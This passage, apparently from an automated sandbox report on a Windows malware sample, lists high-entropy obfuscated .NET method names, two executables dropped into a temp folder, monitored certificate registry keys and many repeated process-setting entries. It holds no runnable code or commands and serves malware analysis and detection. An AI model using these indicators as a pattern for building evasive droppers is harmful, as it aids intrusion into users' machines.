                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, lY7fu9PmBNVoe7FoMUHT8miYA4vYaJzHYkvOgkLtM9q5YWq4XECDe3geFnamAon5jKsHVH7R7dVyQ7jT.csHigh entropy of concatenated method names: '_5okLwiJ41foiIntIR1bpQIYeVfb2NjbOtPiEyruBdM93JdUDOzPl2DNcdaVHYoqzlbhpqvLy0J9EUv5c', 'zRuxKtrhDWbunSLsf08MNFwph9WUoxAFk7Peo2bBSgilCpod6rdX1Dipbez5CkglY8zOH38ZMrRgwDGy', 'fZjSXjVI15O2JneQcWK85ilLwUINAP6B4FkyPJRSzFE61yuJPAJ19HsvusKKZTzfg7lUQuBArOldit1m', 'H9LK03UymbxxebVhWZLTVv3J88tyfIEKzzm9OStrPybmLFzdpu1V3lVipOh8awPV4gwN4DXIusrByqJs', 'staanouH9VVllYfUirHPC8zURapjFNgkbkbX2so6bIvb3wjagEhKC8k4nreHsHMrkbfHI1zpEdwNYZDe', 'pksVU8d9sjP2rIBvVbq1TZVmILG3XBWNflKO6HKmIgXkSbX6NZ5DgPC3M0cZ9EsA0GNH75zt5OAnngZT', 'GxfNTiSDCrb2TBkwI3tRzIuCv', 'iqbQLy0cKqXw68POWUFeBa0d0', 'aQEYPV88MgVpz2hMiTlWb6OeS', 'TcHYqV6bJRKM2fPlJrCwUZzmw'
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eaJ1eKHKproU4hPKL7zZaCt5LB6GnC019powyiFeyxf1p497Wp7fUp93E51MTTI9BUzY4mbqnkBEPVkB.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'rjdrfrwAPPrH1gmYvWMyWqSDfwqLZrtzMOvlKFth4qIJyiOf0wirwL5Om8LDhRnfIXZdMIop9WZXlb93', 'xXTE3lS6QGxTBbQ6kgQwrnpXxPaNKn9C9N6INDuT2MlzvDfgO4DXX3oQtM', 'CoeaOGHXL0uzLmA25lE8RaXN5bTKg89qRqnXEiCDnBpP14hEsB1GcFe021', 'zlIqWsIOWHNCPt6mOc8ndEvujhC768c6GbdgaLArA3C', 'efdMufKoG8bO1IUbkgO4A2TnkTN9z1dusJF9Pcw3daY'
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, AJvfNnDNTuJbwuIBkqtWLE92s69ypiSn3oEaccD5GcHIniAl3b0xmXCXXRQlDua39ELK6FfoXcbxDFtY.csHigh entropy of concatenated method names: 'Zc0UAmirWNgMyU7RPbJclq0193JoKzdFjsT4ZUKLtBhG1SBtPc6mSKSfvhSv0MF6g3KbymOiN34vXBn2', 'xTtuDFtpunXLooIWmqJev5GyqjMpjlO5Pn7UNZnkHrIGoYIGVa7IoMZCEfCFnDuXsUC2rwixA1bjDEUw', 'qOAWJaM4h2YSCf2MDhBIMnRhdMBJLpG0SKzQTS3P80vgUs7g3cS7PK9ThtidaIT1R0d1c5geZf4JXViM', '_2GsH2tkogI2SHuEIgb66fa097', '_6NGmkasVpmvh070n767Zd89nMCnZKzTKwRTM5nXWcHH', 'HRTNPv742zdrFAMGwyGGxu87xflCuNVlRzsJRf3UiCU', 'V79dguIYFqPHIKmsX53d2RFCHn4VhwACswLW99D4JC7', 'IZMLsuKXM0BIC3Kj75qehAvrxsOQwkZ30Igw0JxA80b', '_8bWGcTHdIsr9qNXOZP7YFjCbS0Kns99IFIzGWB3tHiN', 'R3atKa2W4XuqIcUUDI38NAdMcGQGZVbBvDxDMlnf6KB'
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, jGx5RVtWYDbZ1ToL6PNlOwWojB7jLJ6X5CBAFyGmvjvmlmioDwDZ5YjCVlsreufEP7Xse0xBH6GOHG8W.csHigh entropy of concatenated method names: 'PtV3PgKoBJTBfHxOerUNidcwttFhlmwA8WDrWJTvwC2tOWY6l2hr9WVMOE316RohdBnAt9DUJhilYxz3', '_8BcFZG9nKm0Y5eKfyHrDW01Wvwc7CixNNvv1qM9DSM7Xw9wX7hUMTZk9L2NrMS48M02xNbGRVqjpgeq0', 'r2jWTD7FccKEuteed9WoBhB1Vn4JqKKksl3P579LWfpSQW3lTEyzyN91wfwmfHktqShUVwDDavsU1w5r', '_1exytb0IPi12lfcbJAUh2727dO4kKzebEdYC9Pfp0kLBrUrqJOh9CBvY5JR50upgpoe4v1NAZTP9fLwf', 'dZsr8qHlvW1VCFIgnTvIMwWbWMJnC1TmJfHt6k8S2m3inKm9yojdFlmddNEqv0ZiX9eQe4LHUZHN04FI', 'jpDYV1bSvTmVc8YKjIjO2igHlU5iQbA37qnhQlaqhX8i9PzhNLXiZAv3xwb49LcIFxEGJ1FdueFBS7P3', '_2OgwX7POlj3Lc7k0HVLc96Jm1H13YqCu3MmxPt8PTCnT7UO158KKKLsh39l3t9KhGVtNJN8WXk0fPI73', 'pZFSqEaHAjFQiDGNuydShEAx9dEA9Z4XEyA9cjqfApsDWcTUx4G11fj6Fnd4Qa5F3r9uiYWbxvzA5Uoi', 'wPprlMMgS8b7KRfzzaYNtXG224hdQjXdQA2bY9s37h5XyJI0wqfyVDN55SZpOCxoo94AweNHBnHgQ8Tu', '_3DEtVD6Qj8FBLGIMfr4L1gJLG5Wh10yDVfhAwiXkVFEtyC8yiF81mnqH85ItdVEe6Xios4sz19oD7SY6'
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.csHigh entropy of concatenated method names: 'PNucxFnsZsmAH7ZtXAiLbYhTNwtoXdI3jSrG7l8JdFYI8y4ECae9QkpQxfCHI9CjoO37RtMbdN9QCRXA', 'jLiZEHlb8BeExAypewg0zeOoIRJBC4B4awLpTrKIInWmOfnIoqLljjFzAd1r2ByGWGH98bloN9ZRBPtd', 'tLRtcoizkEN95DWlJbuywj8qmTExZ2cF4QDYZKjqtBmUUedW8T9LcTtJFgNgl26hmcD6HXf3sdOMy3G7', 'pUQwgSO8RxKDRVwxnrsUWWj0QvQfWjrWlfB32szLybBrnHNL6P42mf3fEeFhXZQaTya4hKG6HBVYia6X', 'saI1iCbtHUFoBOe0YDbOsFuazEiP9peNaRt8lfw92OqJCrtCr0ntP3cXoqTKn0apPe2I7AbDQPdKNIRC', '_2LsIhZlfyiomhnjRA5BvAhexUvDfebqf3EIoHS0ytB9QGrcn0ugT72LAgdp9Grpxo0H4F7YyXQhOFPOy', '_5AWy2heCIieySYSYqguGUmV6MLXLVTLloftBenWstbEZdWXKjxN3X0bgVyF0wh25yHIvtuM1JbN9IsYP', 'WUvexTw2mL3On7KYwkAaLpgLg4QvlFX5Lg4Hs3pvpuyJAX12BxwE6WI7y2EbRbEwB6Ra5UdwXI7e0OgU', 'Ii9U3wE8YOPWYQykTTsUNk92la58iAVmecCGoooKy9uv8H2onRYJ7hpsTsnh61XZcHrteUk8Xbtobs67', 'kc0jgJebYNKe5XBYQAIof8kMjBCh79rlVPyB41WIALEb1JkDpf7SWQ7eAsYqDHx4WBu3vttZF2VEqDFC'
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, qmTkyAvhb2wNt6EFJkgKoQx8PUNM9p5XrEj4MhYLRljIFetnOWMNbr3hROe7cILDy1AzKJEMlJzfISXn.csHigh entropy of concatenated method names: 'T8N6JYRItBvITsl2B5FCZRlmiaVshMFO1A1pS8qCoXVzg8WrRMPQrOZ2MjWPZDNL96s4ZDXD0859xnzb', 'Hp4ifZNL0Zk6d3JpS3mb9ecb3cvLWnhrESlgjj4yKKVf2HuHhLzO70Ux8rvFtMehJKX6BsXWtMZA8md6', '_5I6uyywkP7w8NWl9CieCynsQVnYWuakDbIwAzhA75v0', 'CZK5mO0F213iwf5NMqGRXS9Fh8854sXfzLFunHGtctS', 'BsZyf5sKGTGC1Lb0aJbVV7wYV9Ce92dym7bdyixwf6K', 'Wo93OYkcN7j0LD2jtZuBD4VOYyPxDuYYemH99eds4Ph'
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, lYfWlfT3r7Vqz88tbfAuCjKRe.csHigh entropy of concatenated method names: 'kOQ5Z9rwMXQQwsQd9U5wJwGgA', '_5IpOq6mDTAwrp2FTSgHzNUZ6U', 'cPbIlTDjsb7RjMx8Bnmb5BlYC', 'EGhvBkBPenl8anH8LxHEcrnawvcgNbGzlNbtSGDZidi', 'qgCXUhcFghV4Gn09Ux0zMANUpUDIbjpm3b5c3qcS7V8', 'SiVz1GzNIesBAG06rJk9SKNR72BDYDvWSYP7WvEdiQH', '_6Zu4a6W2P7MN3pmUPK9UfKjMO1giZz44TN0pivow5UZ', 'PlbLO24x9CCU8itVg1JImlB5d4peV1YS2Vsh7vULx3N', 'JDQPF1e80PPfAgh8UwKHm2qZ3SrjjTSDyRimnu0c1qC', 'Kv47HDZaPJK92FJq6cVgfoBr0skPYGt056SQmCHp3NL'
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, ZQNenIJ11v1eDG5LYuP2OrWwHq14u0rIiwxz57g1fXStOp9D7M6RmGJ4YKEdVQ5EUUTCTZv7PDDfMtzT.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'b6mTyduYMePwCfdIKIVaMUPHF', 'EJWHS3NIZk5yrShQV6UbTF7iG', 'HQWI8F3Evo98iZXl7nPp03wUd', 'uVfhorrceO8DDy2jZSCP4sjid'
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.csHigh entropy of concatenated method names: 'WOKIIYrThZTCGte1A75mpaGYcGTIovkGFkNhoWEfchfLgJza6BJD6Bwb8ldtUxY27BZGcEQ6Ko22VL0v', '_2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG', 'ct6moaFmxzSEwIBSw5rpr8RVGDQyhSzLEcWeKPn3GlTwBRfSaIJQGP4EqzmGtbrppHVemlokSFDIFISr', 'jUfEW1HLDovEWv1ZZ2zNiS7OUyhKjeBJXG86gTqRm21d1n8vbqzTfp312I43KRCVmeRCgSzDJZYBLYjh', 'gFbqVU5GBTH4rOArujDduUnOvWjfsKUedwGzlcoMMdxUxFKDjxuRbkOJ169CFT9IuRiDSHyxz88kCye0', '_639np3BrkfPYmPr9VF1r5l8eJcR7h6v7PQmNuTkTMjKBkD9o6eKvLwfYP4KVxtbHN8XIPtcwCW848AA5', '_4oih0kLo1v9w1DiU35KzsmEf23mDdPUhb668zPHv7Z9yZOdcwmAGhhBWdUpnyLSHCBVu8Td7QNPAcVDZ', 'EUaHo9pU6vromjIH1zi7gXzYtQGwuar6S7KHNbk1HrSucXpIoSL7I0aHw5NdgXG3IFRHPeNrXOw8so1J', 'QeaFyp7eNMwyVwtHpKxgZRxvsNRfRibyJWARpIr7sDRV2kDKRCjnVVuiToPBdap401IV879hVobpmuqK', 'V41AXdXRfohEGR0ea2I1kBGrbFeFb7frm4Y3YZ1FB2QHwHi368a6UPrH3ZgAmiKBBqkh0cS3TNxAQoXi'
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, hMY5B4KaPYBa602NktZ1e4wVF.csHigh entropy of concatenated method names: 'WxO6haGbmISoUIXjKWGw5O0f6', '_1KdIk1gCCecm5eb5zn8kSjK12', 'PxlPQIsDfwQvPbKvl2sd3YzC2', 'PQy6sJgSzykRZLc0OQgp3FF40', 'EILjjH71J0z6TCdH4iiqNMin5', 'QyEqwp20c4swV4XJJGsgNpnyq', 'LcILsujkk2zDB1CPWPVFG2jJx', 'uJOKVr0lx53sKgbsneL3CqWRx', 'f9VWvJM0sfsTL6ygejd44nBUT', 'LlvOkQs0TO79zqf2p1q3KccCh'
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, jK41xlYzptzDvBwid77hpLBxe.csHigh entropy of concatenated method names: 'OKzUlm8N3VhAQNuXvYaHxIv0O', '_2jsV4Dr67P8WIcVYQJEwwfWilcqMU7dWO5FaXzBdwnR', 't33agRLkVoIksIMaeHSr25f5MenSU0vXFDLuVr5rAWm', 'BVIgd1nQM1laXCOCutMUo4uF0HHRkd5UhpQp2AsEeS6', 'Ra43n4P4GpAazsLfytyMIOCicKFs70KMZtEfMom59my'
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, bfkfUlXphuDWexMb7Hptw9A0Uiqaqiv3wcTDH2rsesSLHtj7cBMyE3HGKstJUv0HzfSu8adin33UdVLY.csHigh entropy of concatenated method names: 'HDzzscQJvBYBgYGtyyJw0Z62S91wb7ZXDt1NMuqGZTnSVN2vcQlDTHXeH2XAhC3gmojn3hCdfamp4xSP', 'DyRfj0jL7Ne2bEzdE2WfU2J4e', '_5cwjx4oJK76DGZBC7HDMSIo6L', 'EkkfnLKHA7eoPdl7FGnKbHjqz', 'XPrOaSGzOF9BMPB0rdF2ZuE16'
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, pSKX2ESKYwtRu7HoonhxcJzXgzsbsBZuYOVd9Vds3yt1hGYR8g17cCz98HD7kBGbZuAOSHn3AJPgLdPW.csHigh entropy of concatenated method names: 'RegexResult', 'WndProc', 'AlbU71MZss4P6Ud3ulC0jWSFtpHi3ZI21vljNexmkwF', 'vaWpfakNS07K6OJldx85Yn0LszjPpqeyLwg5G7rfYDr'
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, lY7fu9PmBNVoe7FoMUHT8miYA4vYaJzHYkvOgkLtM9q5YWq4XECDe3geFnamAon5jKsHVH7R7dVyQ7jT.csHigh entropy of concatenated method names: '_5okLwiJ41foiIntIR1bpQIYeVfb2NjbOtPiEyruBdM93JdUDOzPl2DNcdaVHYoqzlbhpqvLy0J9EUv5c', 'zRuxKtrhDWbunSLsf08MNFwph9WUoxAFk7Peo2bBSgilCpod6rdX1Dipbez5CkglY8zOH38ZMrRgwDGy', 'fZjSXjVI15O2JneQcWK85ilLwUINAP6B4FkyPJRSzFE61yuJPAJ19HsvusKKZTzfg7lUQuBArOldit1m', 'H9LK03UymbxxebVhWZLTVv3J88tyfIEKzzm9OStrPybmLFzdpu1V3lVipOh8awPV4gwN4DXIusrByqJs', 'staanouH9VVllYfUirHPC8zURapjFNgkbkbX2so6bIvb3wjagEhKC8k4nreHsHMrkbfHI1zpEdwNYZDe', 'pksVU8d9sjP2rIBvVbq1TZVmILG3XBWNflKO6HKmIgXkSbX6NZ5DgPC3M0cZ9EsA0GNH75zt5OAnngZT', 'GxfNTiSDCrb2TBkwI3tRzIuCv', 'iqbQLy0cKqXw68POWUFeBa0d0', 'aQEYPV88MgVpz2hMiTlWb6OeS', 'TcHYqV6bJRKM2fPlJrCwUZzmw'
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eaJ1eKHKproU4hPKL7zZaCt5LB6GnC019powyiFeyxf1p497Wp7fUp93E51MTTI9BUzY4mbqnkBEPVkB.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'rjdrfrwAPPrH1gmYvWMyWqSDfwqLZrtzMOvlKFth4qIJyiOf0wirwL5Om8LDhRnfIXZdMIop9WZXlb93', 'xXTE3lS6QGxTBbQ6kgQwrnpXxPaNKn9C9N6INDuT2MlzvDfgO4DXX3oQtM', 'CoeaOGHXL0uzLmA25lE8RaXN5bTKg89qRqnXEiCDnBpP14hEsB1GcFe021', 'zlIqWsIOWHNCPt6mOc8ndEvujhC768c6GbdgaLArA3C', 'efdMufKoG8bO1IUbkgO4A2TnkTN9z1dusJF9Pcw3daY'
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, AJvfNnDNTuJbwuIBkqtWLE92s69ypiSn3oEaccD5GcHIniAl3b0xmXCXXRQlDua39ELK6FfoXcbxDFtY.csHigh entropy of concatenated method names: 'Zc0UAmirWNgMyU7RPbJclq0193JoKzdFjsT4ZUKLtBhG1SBtPc6mSKSfvhSv0MF6g3KbymOiN34vXBn2', 'xTtuDFtpunXLooIWmqJev5GyqjMpjlO5Pn7UNZnkHrIGoYIGVa7IoMZCEfCFnDuXsUC2rwixA1bjDEUw', 'qOAWJaM4h2YSCf2MDhBIMnRhdMBJLpG0SKzQTS3P80vgUs7g3cS7PK9ThtidaIT1R0d1c5geZf4JXViM', '_2GsH2tkogI2SHuEIgb66fa097', '_6NGmkasVpmvh070n767Zd89nMCnZKzTKwRTM5nXWcHH', 'HRTNPv742zdrFAMGwyGGxu87xflCuNVlRzsJRf3UiCU', 'V79dguIYFqPHIKmsX53d2RFCHn4VhwACswLW99D4JC7', 'IZMLsuKXM0BIC3Kj75qehAvrxsOQwkZ30Igw0JxA80b', '_8bWGcTHdIsr9qNXOZP7YFjCbS0Kns99IFIzGWB3tHiN', 'R3atKa2W4XuqIcUUDI38NAdMcGQGZVbBvDxDMlnf6KB'
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, jGx5RVtWYDbZ1ToL6PNlOwWojB7jLJ6X5CBAFyGmvjvmlmioDwDZ5YjCVlsreufEP7Xse0xBH6GOHG8W.csHigh entropy of concatenated method names: 'PtV3PgKoBJTBfHxOerUNidcwttFhlmwA8WDrWJTvwC2tOWY6l2hr9WVMOE316RohdBnAt9DUJhilYxz3', '_8BcFZG9nKm0Y5eKfyHrDW01Wvwc7CixNNvv1qM9DSM7Xw9wX7hUMTZk9L2NrMS48M02xNbGRVqjpgeq0', 'r2jWTD7FccKEuteed9WoBhB1Vn4JqKKksl3P579LWfpSQW3lTEyzyN91wfwmfHktqShUVwDDavsU1w5r', '_1exytb0IPi12lfcbJAUh2727dO4kKzebEdYC9Pfp0kLBrUrqJOh9CBvY5JR50upgpoe4v1NAZTP9fLwf', 'dZsr8qHlvW1VCFIgnTvIMwWbWMJnC1TmJfHt6k8S2m3inKm9yojdFlmddNEqv0ZiX9eQe4LHUZHN04FI', 'jpDYV1bSvTmVc8YKjIjO2igHlU5iQbA37qnhQlaqhX8i9PzhNLXiZAv3xwb49LcIFxEGJ1FdueFBS7P3', '_2OgwX7POlj3Lc7k0HVLc96Jm1H13YqCu3MmxPt8PTCnT7UO158KKKLsh39l3t9KhGVtNJN8WXk0fPI73', 'pZFSqEaHAjFQiDGNuydShEAx9dEA9Z4XEyA9cjqfApsDWcTUx4G11fj6Fnd4Qa5F3r9uiYWbxvzA5Uoi', 'wPprlMMgS8b7KRfzzaYNtXG224hdQjXdQA2bY9s37h5XyJI0wqfyVDN55SZpOCxoo94AweNHBnHgQ8Tu', '_3DEtVD6Qj8FBLGIMfr4L1gJLG5Wh10yDVfhAwiXkVFEtyC8yiF81mnqH85ItdVEe6Xios4sz19oD7SY6'
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.csHigh entropy of concatenated method names: 'PNucxFnsZsmAH7ZtXAiLbYhTNwtoXdI3jSrG7l8JdFYI8y4ECae9QkpQxfCHI9CjoO37RtMbdN9QCRXA', 'jLiZEHlb8BeExAypewg0zeOoIRJBC4B4awLpTrKIInWmOfnIoqLljjFzAd1r2ByGWGH98bloN9ZRBPtd', 'tLRtcoizkEN95DWlJbuywj8qmTExZ2cF4QDYZKjqtBmUUedW8T9LcTtJFgNgl26hmcD6HXf3sdOMy3G7', 'pUQwgSO8RxKDRVwxnrsUWWj0QvQfWjrWlfB32szLybBrnHNL6P42mf3fEeFhXZQaTya4hKG6HBVYia6X', 'saI1iCbtHUFoBOe0YDbOsFuazEiP9peNaRt8lfw92OqJCrtCr0ntP3cXoqTKn0apPe2I7AbDQPdKNIRC', '_2LsIhZlfyiomhnjRA5BvAhexUvDfebqf3EIoHS0ytB9QGrcn0ugT72LAgdp9Grpxo0H4F7YyXQhOFPOy', '_5AWy2heCIieySYSYqguGUmV6MLXLVTLloftBenWstbEZdWXKjxN3X0bgVyF0wh25yHIvtuM1JbN9IsYP', 'WUvexTw2mL3On7KYwkAaLpgLg4QvlFX5Lg4Hs3pvpuyJAX12BxwE6WI7y2EbRbEwB6Ra5UdwXI7e0OgU', 'Ii9U3wE8YOPWYQykTTsUNk92la58iAVmecCGoooKy9uv8H2onRYJ7hpsTsnh61XZcHrteUk8Xbtobs67', 'kc0jgJebYNKe5XBYQAIof8kMjBCh79rlVPyB41WIALEb1JkDpf7SWQ7eAsYqDHx4WBu3vttZF2VEqDFC'
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, qmTkyAvhb2wNt6EFJkgKoQx8PUNM9p5XrEj4MhYLRljIFetnOWMNbr3hROe7cILDy1AzKJEMlJzfISXn.csHigh entropy of concatenated method names: 'T8N6JYRItBvITsl2B5FCZRlmiaVshMFO1A1pS8qCoXVzg8WrRMPQrOZ2MjWPZDNL96s4ZDXD0859xnzb', 'Hp4ifZNL0Zk6d3JpS3mb9ecb3cvLWnhrESlgjj4yKKVf2HuHhLzO70Ux8rvFtMehJKX6BsXWtMZA8md6', '_5I6uyywkP7w8NWl9CieCynsQVnYWuakDbIwAzhA75v0', 'CZK5mO0F213iwf5NMqGRXS9Fh8854sXfzLFunHGtctS', 'BsZyf5sKGTGC1Lb0aJbVV7wYV9Ce92dym7bdyixwf6K', 'Wo93OYkcN7j0LD2jtZuBD4VOYyPxDuYYemH99eds4Ph'
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeFile created: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeJump to dropped file
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeFile created: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeJump to dropped file
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
